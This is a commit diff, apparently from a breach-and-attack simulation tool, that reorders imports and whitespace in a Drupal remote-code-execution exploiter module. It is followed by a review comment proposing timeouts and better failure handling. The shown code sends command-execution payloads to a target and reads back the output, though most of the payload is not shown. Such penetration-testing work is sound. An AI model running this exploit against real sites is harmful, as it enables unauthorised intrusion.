Update minor things in order to pass CI build

Shay Nehmad 2020-09-01 11:48:06 +03:00
parent e7ecaa1744
commit cec57c1604
2 changed files with 15 additions and 12 deletions


@ -1,6 +1,7 @@
from unittest import TestCase from unittest import TestCase
from common.network.network_utils import get_host_from_network_location, remove_port from common.network.network_utils import (get_host_from_network_location,
remove_port)
class TestNetworkUtils(TestCase): class TestNetworkUtils(TestCase):


@ -5,11 +5,13 @@ Implementation is based on:
""" """
import logging import logging
import requests
from urllib.parse import urljoin from urllib.parse import urljoin
import requests
from common.network.network_utils import remove_port
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING from infection_monkey.model import ID_STRING
from network.network_utils import remove_port
__author__ = 'Ophir Harpaz' __author__ = 'Ophir Harpaz'
@ -102,15 +104,15 @@ class DrupalExploiter(WebRCE):
"value": "" "value": ""
} }
} }
response = requests.get(f'{url}?_format=hal_json', response = requests.get(f'{url}?_format=hal_json',
json=payload, json=payload,
headers={"Content-Type": "application/hal+json"}) headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(response): if check_drupal_cache(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
return False return False
return 'INVALID_VALUE does not correspond to an entity on this site' in response.text return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
def exploit(self, url, command): def exploit(self, url, command):
@ -138,21 +140,21 @@ class DrupalExploiter(WebRCE):
} }
} }
} }
LOG.info(payload) LOG.info(payload)
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(r): if check_drupal_cache(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed') LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
if ID_STRING not in r.text: if ID_STRING not in r.text:
LOG.warning('Command execution _may_ have failed') LOG.warning('Command execution _may_ have failed')
result = r.text.split(ID_STRING)[-1] result = r.text.split(ID_STRING)[-1]
LOG.info(f'Drupal exploit result = {result}') LOG.info(f'Drupal exploit result = {result}')
return result return result
def get_target_url(self): def get_target_url(self):
""" """
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL. We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
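Review bot: Both `requests.get` calls shown in this file (the vulnerability check in the hunk at -102/+104 and the one in `exploit` in the hunk at -138/+140) are made without a `timeout`, and requests applies none by default, so a host that accepts the connection and never answers would block the calling thread indefinitely. Pass an explicit bound, e.g. `r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}, timeout=REQUEST_TIMEOUT_SECONDS)`, where `REQUEST_TIMEOUT_SECONDS` is a placeholder for whatever constant the project already uses. Separately, in `exploit` the missing-`ID_STRING` case only logs a warning and then still returns `r.text.split(ID_STRING)[-1]`, which in that case is the whole response body, so a caller cannot tell it apart from real command output and the run may be reported as successful. Returning early after the warning looks safer, though the caller's contract is not visible here. Both functions begin outside the visible hunks.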